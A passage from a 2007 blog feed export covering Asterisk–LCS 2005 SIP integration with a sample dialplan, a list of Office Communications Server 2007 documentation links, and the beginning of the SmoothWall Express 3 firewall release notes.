/&gt;&lt;a href="http://bugs.digium.com/view.php?id=4903"&gt;http://bugs.digium.com/view.php?id=4903&lt;/a&gt; &lt;br /&gt;Step1: configure LCS 2005 to let sip uri: *@pstngw.domain to route to &lt;br /&gt;next hop: pstngw ip address &lt;br /&gt;Step2: patch your asterisk chan_sip.c to support TCP &lt;br /&gt;Step3: configure your Asterisk sip.conf, extensions.conf &lt;br /&gt;&lt;br /&gt;simple example  :-) &lt;br /&gt;sip.conf &lt;br /&gt;context=sip_incoming &lt;br /&gt;&lt;br /&gt;extensions.conf &lt;br /&gt;[sip_incoming] &lt;br /&gt;exten =&gt; _XX.,1,Answer &lt;br /&gt;exten =&gt; _XX.,2,Noop(do trust ip check or some authentication) &lt;br /&gt;exten =&gt; _XX.,3,Dial(Zap/${EXTEN}&amp;amp;SIP/${EXTEN})  &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;Use this page to find documentation and other content to help you deploy and operate Office Communications Server 2007, Office Communicator 2007, Office Live Meeting 2007, Office Communicator Web Access (2007 release), and Office Communicator Mobile (2007 release).&lt;br /&gt;On This Page&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl02',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump1"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl03',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump1"&gt;Microsoft Office Communications Server 2007&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl04',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump2"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl05',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump2"&gt;Microsoft Office Communicator 2007 &lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl06',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump3"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl07',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump3"&gt;Microsoft Office Communicator Web Access (2007 release)&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl08',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump3a"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl09',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump3a"&gt;Microsoft Office Communicator Mobile (2007 release)&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl10',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump4"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl11',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump4"&gt;Microsoft Office Live Meeting 2007&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl12',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump5"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl13',this);" href="http://technet.microsoft.com/es-co/library/bb676082.aspx#jump5"&gt;End User Reference&lt;/a&gt;&lt;br /&gt;Microsoft Office Communications Server 2007&lt;br /&gt;Getting Started&lt;br /&gt;&lt;a title="Office Communications Server 2007 Documentation Roadmap" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl14',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=3fe6fee9-2342-4726-af48-11b57d1fc9e7&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Documentation Roadmap&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Technical Overview" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl15',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=09b218ea-6ff6-4679-a117-9767ab98990a&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Technical Overview&lt;/a&gt;&lt;br /&gt;Planning&lt;br /&gt;&lt;a title="Office Communications Server 2007 Planning Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl16',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=723347c6-fa1f-44d8-a7fa-8974c3b596f4&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Planning Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Voice Planning and Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl17',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=24e72dac-2b26-4f43-bba2-60488f2aca8d&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Voice Planning and Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="New Link" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl18',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=726e6f82-4f2b-456f-98e7-a3f235e508ce&amp;amp;displaylang=en"&gt;Designing for Adoption: Real-time Audio in the Real World&lt;/a&gt;&lt;br /&gt;&lt;a title="Integrating Telephony with Office Communications Server 2007" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl19',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=8cde0c3a-042e-445b-a514-2d12ed5b2ac2&amp;amp;displaylang=en"&gt;Integrating Telephony with Office Communications Server 2007&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Quality of Experience" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl20',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=05625af1-3444-4e67-9557-3fd5af9ae8d1&amp;amp;displaylang=en"&gt;Microsoft Quality of Experience&lt;/a&gt;&lt;br /&gt;Deployment&lt;br /&gt;&lt;a title="Office Communications Server 2007 Active Directory Guide: Preparing Active Directory, Delegating Permissions and Schema Reference" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl21',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=384793a6-d315-4217-b034-6d189ef6df13&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Active Directory Guide: Preparing Active Directory, Delegating Permissions and Schema Reference&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Standard Edition Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl22',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=1068beb2-4370-4c66-a3dc-55bdd032b857&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Standard Edition Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Enterprise Edition Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl23',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=53f65dc9-09dc-4748-81f7-48457469e550&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Enterprise Edition Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Archiving and CDR Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl24',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=52627734-b354-4f74-a6ed-e298259cda19&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Archiving and CDR Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Edge Server Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl25',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=ed45b74e-00c4-40d2-abee-216ce50f5ad2&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Edge Server Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Voice Planning and Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl26',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=24e72dac-2b26-4f43-bba2-60488f2aca8d&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Voice Planning and Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Deploying the Microsoft Office Live Meeting 2007 Client with Office Communications Server 2007" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl27',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=3539cb05-12fd-425b-9317-ce6ab0a2e3cf&amp;amp;displaylang=en"&gt;Deploying the Microsoft Office Live Meeting 2007 Client with Office Communications Server 2007&lt;/a&gt;&lt;br /&gt;&lt;a title="Deploying Office Communications Server in a Multiple Forest Environment" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl28',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=1d7cf1e6-6770-422f-b744-e1764f5666ae&amp;amp;displaylang=en"&gt;Deploying Office Communications Server in a Multiple Forest Environment&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communications Server 2007 Command Line Reference Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl29',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=84651696-1368-4700-aacf-de9bd4456595&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Command Line Reference Guide&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl30',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=54a5521d-a928-46f2-8bf7-125da636dd2e&amp;amp;displaylang=en"&gt;Upgrading Office Communications Server 2007 Evaluation to the Full Released Version&lt;/a&gt;&lt;br /&gt;Migration&lt;br /&gt;&lt;a title="Migrating to Office Communications Server 2007" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl31',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=20f67afc-6af5-4a03-99bf-4150def36457&amp;amp;displaylang=en"&gt;Migrating to Office Communications Server 2007&lt;/a&gt;&lt;br /&gt;Operations&lt;br /&gt;&lt;a title="Office Communications Server 2007 Administration Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl32',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=cb7dc2de-4504-484e-9229-bd8614be0633&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Administration Guide&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl33',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=5c6e6ac7-079a-4326-b517-3c117fadb44e&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Backup and Restoration Guide&lt;/a&gt;&lt;br /&gt;Security&lt;br /&gt;Office Communications Server 2007 Security Guide—coming soon&lt;br /&gt;Technical Reference&lt;br /&gt;Office Communications Server 2007 Technical Reference Guide—coming soon&lt;br /&gt;&lt;a title="Office Communications Server 2007 Command Line Reference Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl36',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=84651696-1368-4700-aacf-de9bd4456595&amp;amp;displaylang=en"&gt;Office Communications Server 2007 Command Line Reference Guide&lt;/a&gt;&lt;br /&gt;Microsoft Office Communicator 2007&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 What’s New Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl37',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=39b9a6d4-5862-4a01-a2a6-ac193e77aed7&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 What’s New Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Planning and Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl38',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=f1d1a947-6eff-4ac4-8878-f0a77894ac99&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Planning and Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Testing and Troubleshooting" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl39',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=db9b4f8f-f0f7-4157-82ad-395f4c631a4e&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Testing and Troubleshooting&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Group Policy Settings " onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl40',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=69512283-7ed6-40a6-82a8-b215da051d9a&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Group Policy Settings &lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Group Policies Documentation " onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl41',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=dd3cae08-3153-4c6a-a314-daa79d616248&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Group Policies Documentation &lt;/a&gt;&lt;br /&gt;Microsoft Office Communicator Web Access (2007 release)&lt;br /&gt;&lt;a title="Office Communicator Web Access  Getting Started Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl42',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=aebb3f5a-6fdc-4447-a96b-592953cd305c&amp;amp;displaylang=en"&gt;Office Communicator Web Access Getting Started Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communicator Web Access Guide to Lab Deployment" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl43',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=0e21123a-8452-4b25-8cde-57f750cd7803&amp;amp;displaylang=en"&gt;Office Communicator Web Access Guide to Lab Deployment&lt;/a&gt;&lt;br /&gt;&lt;a title="Office Communicator Web Access Planning and Deployment Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl44',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=62d61142-8ac1-4e56-afa9-e99801b703f6&amp;amp;displaylang=en"&gt;Office Communicator Web Access Planning and Deployment Guide&lt;/a&gt;&lt;br /&gt;Microsoft Office Communicator Mobile (2007 release)&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl45',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=892e9c25-1a0b-436d-b112-033d9993e034&amp;amp;displaylang=en"&gt;Office Communicator Mobile Planning and Deployment Guide&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl46',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=6de9c753-5c89-4fa5-924f-a9cf8e877394&amp;amp;displaylang=en"&gt;Office Communicator Mobile Release Notes&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl47',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=cfd79278-ac9d-4755-ae98-5922561927b9&amp;amp;displaylang=en"&gt;Office Communicator Mobile Troubleshooting Guide&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl48',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=96346923-bb96-4558-908f-d11195832565&amp;amp;displaylang=en"&gt;Office Communicator Mobile Frequently Asked Questions&lt;/a&gt;&lt;br /&gt;Microsoft Office Live Meeting 2007&lt;br /&gt;&lt;a title="Deploying the Microsoft Office Live Meeting 2007 Client with Office Communications Server 2007" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl49',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=3539cb05-12fd-425b-9317-ce6ab0a2e3cf&amp;amp;displaylang=en"&gt;Deploying the Microsoft Office Live Meeting 2007 Client with Office Communications Server 2007&lt;/a&gt;&lt;br /&gt;End User Reference&lt;br /&gt;Communicator 2007&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Getting Started Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl50',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=f7e5a6b9-df2e-420e-a0d8-c482ca4db50e&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Getting Started Guide&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Quick Reference Card for IM and Presence" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl51',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=e0c77b42-b7ee-4392-822b-7d82ccaaadb9&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Quick Reference Card for IM and Presence&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Quick Reference Card for Conferencing" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl52',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=ce1bf10d-8b13-4710-8972-c47b9cea4209&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Quick Reference Card for Conferencing&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Quick Reference Card for Phone and Video" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl53',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=3315fa6d-5a9a-443d-9795-05354b401ae6&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Quick Reference Card for Phone and Video&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Short Cut Keys" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl54',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=2ae1f18b-d20a-4419-abd9-140586db9a8f&amp;amp;displaylang=en&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Short Cut Keys&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Communicator 2007 Frequently Asked Questions" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl55',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=16c8a0cb-ad0a-4393-8297-664d9a049f4a&amp;amp;displaylang=en"&gt;Microsoft Office Communicator 2007 Frequently Asked Questions&lt;/a&gt;&lt;br /&gt;Office Communicator Web Access&lt;br /&gt;&lt;a title="Microsoft Office Communicator  Web Access Getting Started Guide" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl56',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=aebb3f5a-6fdc-4447-a96b-592953cd305c&amp;amp;displaylang=en"&gt;Microsoft Office Communicator Web Access Getting Started Guide&lt;/a&gt;&lt;br /&gt;Office Communicator Mobile&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl57',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=739ce707-2a35-4714-95f6-1d9f394ccae2&amp;amp;displaylang=en"&gt;Office Communicator Mobile User's Guide&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl58',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=83e972a8-81a1-4d51-bbef-74396b0f2641&amp;amp;displaylang=en"&gt;Office Communicator Mobile Quick Reference Card for IM and Presence&lt;/a&gt;&lt;br /&gt;&lt;a onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl59',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=b185ddc6-b67b-43a1-8bbb-2cc59fa4a46d&amp;amp;displaylang=en"&gt;Office Communicator Mobile Quick Reference Card for Installation and Configuration&lt;/a&gt;&lt;br /&gt;Live Meeting&lt;br /&gt;&lt;a title="Getting Started with the Microsoft Office Live Meeting Client for Microsoft Office Communications Server 2007" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl60',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=c109b20f-33a9-4dd0-ae5b-3b753c0199e6&amp;amp;displaylang=en"&gt;Getting Started with the Microsoft Office Live Meeting Client for Microsoft Office Communications Server 2007&lt;/a&gt;&lt;br /&gt;&lt;a title="Microsoft Office Live Meeting Quick Reference Card for Office Communications Server 2007" onclick="javascript:Track('ctl00_LibFrame_ctl01ctl00_LibFrame_ctl61',this);" href="http://www.microsoft.com/downloads/details.aspx?familyid=5b7a9e68-9b68-424b-a85e-041ca4d36fd7&amp;amp;displaylang=en"&gt;Microsoft Office Live Meeting Quick Reference Card for Office Communications Server 2007&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8778460237986132452?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8778460237986132452/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8778460237986132452' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8778460237986132452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8778460237986132452'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/office-communications-server-asterisk.html' title='Office Communications Server &amp; Asterisk'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-119692552372814135</id><published>2007-09-19T11:56:00.000-07:00</published><updated>2007-09-19T11:57:13.604-07:00</updated><title type='text'>SmoothWall Express 3</title><content type='html'>&lt;div class="pagetitle"&gt;  SmoothWall Express 3 - "Polar" Release Notes  &lt;/div&gt;   &lt;p&gt;&lt;b&gt;Introduction&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;Express 3.0 is our latest version of the long running and successful SmoothWall Express firewall. &lt;/p&gt;   &lt;p&gt;&lt;b&gt;Editions&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;Polar is available in four editions:&lt;/p&gt;   &lt;ul&gt;&lt;li&gt;User edition - 32bit  &lt;/li&gt;&lt;li&gt;Developer edition - 32bit  &lt;/li&gt;&lt;li&gt;User edition - 64bit  &lt;/li&gt;&lt;li&gt;Developer edition - 64bit  &lt;/li&gt;&lt;/ul&gt;   &lt;p&gt;The developer editions includes the complete SmoothWall Express functionality, but also contains the needed tools for working on Express itself, including complete builds, check outs and commits. It is therefore possible for interested coders to work on Express from their very own firewall. This marks a turning point for SmoothWall: it is now easier then ever for people to work on the project, make custom modifications and get involved with the SmoothWall team.&lt;/p&gt;   &lt;p&gt;Please bear in mind that in order to do full builds of Express, a reasonable spec machine and a fair of amount of patience is required. Typical build times are about 5 hours for a 1Ghz machine.&lt;/p&gt;   &lt;p&gt;Please read the &lt;a href="http://smoothwall.org/get/release/build.php"&gt;build notes&lt;/a&gt; for more information on using the Developer Edition edition of Polar, including instructions on how to checkout and build a Polar ISO from scratch.&lt;/p&gt;   &lt;p&gt;&lt;b&gt;64bit support&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;Degu (the version before Sammy, our Release Candidate) was the first ever version of SmoothWall to come in multiple architectures: 32bit, for standard x86 compatibles; and 64bit, for Intel Core 2s (and other Intels with 64bit support) and 64bit Athlon chips. This change to multiple processor types means that updates are specific to the different architectures. We are especially interested to hear from people running Smoothie on 64bit machines.&lt;/p&gt;   &lt;p&gt;Please note that there are some small limitations on hardware support when running on a 64bit machine. The BeWAN driver, used in Smoothie for years, is not available on 64bit machines because it uses a binary blob (compiled code) that is not available for 64bit machines. Also, the Connexant driver does not work on 64bit machines.&lt;/p&gt;   &lt;p&gt;&lt;b&gt;Headline new features relative to 2.0.&lt;/b&gt;   &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Supports a 4th NIC for Wireless Access Points.&lt;/li&gt;&lt;li&gt;64bit support - additional builds for 64bit Intel and AMD chips.&lt;/li&gt;&lt;li&gt;Based upon linux 2.6 kernel.&lt;/li&gt;&lt;li&gt;New realtime traffic graph shows traffic bandwidth usage over time (AJAX).&lt;/li&gt;&lt;li&gt;Per-IP address traffic statistics collection in all traffic stats pages - you can now view weekly, monthly, etc totals for specific internal IPs, or see which local IP is using the most bandwidth, in real-time.&lt;/li&gt;&lt;li&gt;IM proxy with logging and filtering abilities (MSN/AIM/ICQ/Yahoo).&lt;/li&gt;&lt;li&gt;SATA/SCSI support.&lt;/li&gt;&lt;li&gt;Support for many new gigabit NICs.&lt;/li&gt;&lt;li&gt;Streamlined installer/setup.&lt;/li&gt;&lt;li&gt;Quality-of-Service (QoS) support for traffic-shaping and management - nice and easy to use but powerful, can traffic shape Peer-to-Peer traffic.&lt;/li&gt;&lt;li&gt;SIP proxy support using siproxd, with transparent mode.&lt;/li&gt;&lt;li&gt;Protection-level profile selector at install time can be used to pre-configure default settings.&lt;/li&gt;&lt;li&gt;Timed-access feature for allowing or blocking access to a list of IPs or subnets based on time of day and day of the week.&lt;/li&gt;&lt;li&gt;Outbound filtering.&lt;/li&gt;&lt;li&gt;Portforward and other networking pages now use the new service list controls.&lt;/li&gt;&lt;li&gt;New update mechanism which can download and install all pending updates with a single click.&lt;/li&gt;&lt;li&gt;Brand new even prettier theme. The polar bear is back!&lt;/li&gt;&lt;li&gt;Devel editions for people interested in hacking on smoothie.&lt;/li&gt;&lt;/ul&gt;   &lt;p&gt;&lt;b&gt;Detailed list of new features and impovements&lt;/b&gt;&lt;/p&gt;   &lt;ul&gt;&lt;li&gt;Added support for empty hostnames in Dynamic DNS pages.&lt;/li&gt;&lt;li&gt;Runtime kernel now has DMA support for all supported IDE chipsets. Added bridging module (but no tools) for people who want to work with bridging.&lt;/li&gt;&lt;li&gt;Added ISC DHCP integration option to dnsmasq, but no UI.  &lt;/li&gt;&lt;li&gt;Added support for setting the NTP servers that the DHCP server will supply to clients. DHCP server now marks itself as "authorative".&lt;/li&gt;&lt;li&gt;Hostname can now only contain valid chars to stop the situation where you could set a hostname that would be incompatible to squid.&lt;/li&gt;&lt;li&gt;Minor fixes to the networking probe setup code.&lt;/li&gt;&lt;li&gt;Added support for the VT8237A VIA SATA chip.&lt;/li&gt;&lt;li&gt;Updated autorun HTML page so it looks supercool.&lt;/li&gt;&lt;li&gt;Swap sized according to the amount of RAM.&lt;/li&gt;&lt;li&gt;Widended setup password entry from 20 to 25 chars.&lt;/li&gt;&lt;li&gt;Added support for more gigabit nics.&lt;/li&gt;&lt;li&gt;Added Conexant ADSL PCI support.&lt;/li&gt;&lt;li&gt;UPnP support using miniunpd.&lt;/li&gt;&lt;li&gt;Online help now has a glossary.&lt;/li&gt;&lt;li&gt;The "Other" system log viewer has been renamed "System" logs.&lt;/li&gt;&lt;li&gt;Slashes now allowed in PPP usernames and passwords to fix problems with some ISPs.&lt;/li&gt;&lt;li&gt;Cleanups of install and setup code. Also changed probing so it will not re-probe from the top of the list after adding a NIC.&lt;/li&gt;&lt;li&gt;Added EHCI USB, and TUN/TAP modules, but neither are ever loaded at present.&lt;/li&gt;&lt;li&gt;Smoothd privileged deamon replacing setuid helpers, increasing the speed of te web interface.&lt;/li&gt;&lt;li&gt;Installer now supports USB keyboards and CDROMS, making it possible to install Smoothie Express on "legacy-free" hardware.&lt;/li&gt;&lt;li&gt;Now includes a POP3 proxy with support for Anti-Virus using ClamAV.&lt;/li&gt;&lt;li&gt;Online validation using javascript to show input validity before the Add and Save buttons have been pressed.&lt;/li&gt;&lt;li&gt;Many core components have been version-bumped to the latest versions for improved security and reliability.&lt;/li&gt;&lt;li&gt;Tables of data are now sortable.&lt;/li&gt;&lt;li&gt;Can update snort rules using sourcefire's "Oink code" mechanism.&lt;/li&gt;&lt;li&gt;Comments can be included in portforwards and similar listed items.&lt;/li&gt;&lt;li&gt;Can now DROP bad traffic instead of REJECTing it.&lt;/li&gt;&lt;li&gt;GREEN is probed with the other NICs now so it is possible to replace GREEN.&lt;/li&gt;&lt;li&gt;Firewall log viewer looks much nicer and has some AJAX coolness.&lt;/li&gt;&lt;li&gt;Includes many new NIC drivers that are in 2.6.&lt;/li&gt;&lt;li&gt;NTP service for the local network.&lt;/li&gt;&lt;li&gt;Local hosts list that can be served through the DNS proxy.&lt;/li&gt;&lt;li&gt;Replacement traffic stats page.&lt;/li&gt;&lt;li&gt;Many internal changes to make the code more organised and easier to work with.&lt;/li&gt;&lt;li&gt;Jazzed up 